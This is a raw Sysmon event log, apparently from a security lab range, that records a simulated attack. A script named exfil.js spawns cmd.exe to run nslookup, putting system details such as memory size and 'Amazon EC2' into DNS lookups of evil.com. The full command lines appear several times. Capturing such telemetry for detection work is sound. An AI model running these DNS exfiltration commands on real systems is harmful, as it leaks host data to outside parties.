14:16:04.240{2E1864BB-17A4-629A-8B3D-000000005F02}4364984C:\Windows\system32\cmd.exe{2E1864BB-17A4-629A-8D3D-000000005F02}7488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.255{2E1864BB-17A4-629A-8D3D-000000005F02}7488C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A4-629A-8B3D-000000005F02}4364C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpkqfk.tmp 2>&1 10341000x8000000000000000193923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.224{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17A4-629A-8C3D-000000005F02}6020C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.224{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A4-629A-8C3D-000000005F02}6020C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.224{2E1864BB-17A4-629A-8C3D-000000005F02}60207156C:\Windows\system32\conhost.exe{2E1864BB-17A4-629A-8B3D-000000005F02}4364C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.209{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-8C3D-000000005F02}6020C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.209{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-8B3D-000000005F02}4364C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.209{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.209{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.209{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.209{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.209{2E1864BB-17A1-629A-783D-000000005F02}55527212C:\Windows\System32\WScript.exe{2E1864BB-17A4-629A-8B3D-000000005F02}4364C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.209{2E1864BB-17A4-629A-8B3D-000000005F02}4364C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpkqfk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000193912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.193{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrwemmy.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.156{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94B8BDC972AD9696287788957A25583C,SHA256=F4C4BEAA8300EDA7A3B52ADAA20FFAFD237F36EF50C0F22BEC052C9819FA042C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.156{2E1864BB-17A4-629A-893D-000000005F02}63367000C:\Windows\system32\conhost.exe{2E1864BB-17A4-629A-8A3D-000000005F02}5124C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.140{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.140{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.140{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.140{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.140{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-8A3D-000000005F02}5124C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.140{2E1864BB-17A4-629A-883D-000000005F02}59084200C:\Windows\system32\cmd.exe{2E1864BB-17A4-629A-8A3D-000000005F02}5124C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.153{2E1864BB-17A4-629A-8A3D-000000005F02}5124C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A4-629A-883D-000000005F02}5908C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrwemmy.tmp 2>&1 10341000x8000000000000000193902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.124{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17A4-629A-893D-000000005F02}6336C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.124{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A4-629A-893D-000000005F02}6336C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000193900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.124{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE5FB598CA716082CEEE1B3B3221CDEC,SHA256=9E6EFA2C9216D84D15E7B3287527713AA19D37B8C761C8E509C9825C6EB29684,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.124{2E1864BB-17A4-629A-893D-000000005F02}63367000C:\Windows\system32\conhost.exe{2E1864BB-17A4-629A-883D-000000005F02}5908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.109{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-893D-000000005F02}6336C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.093{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-883D-000000005F02}5908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.093{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.093{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.093{2E1864BB-17A1-629A-783D-000000005F02}55527024C:\Windows\System32\WScript.exe{2E1864BB-17A4-629A-883D-000000005F02}5908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.093{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 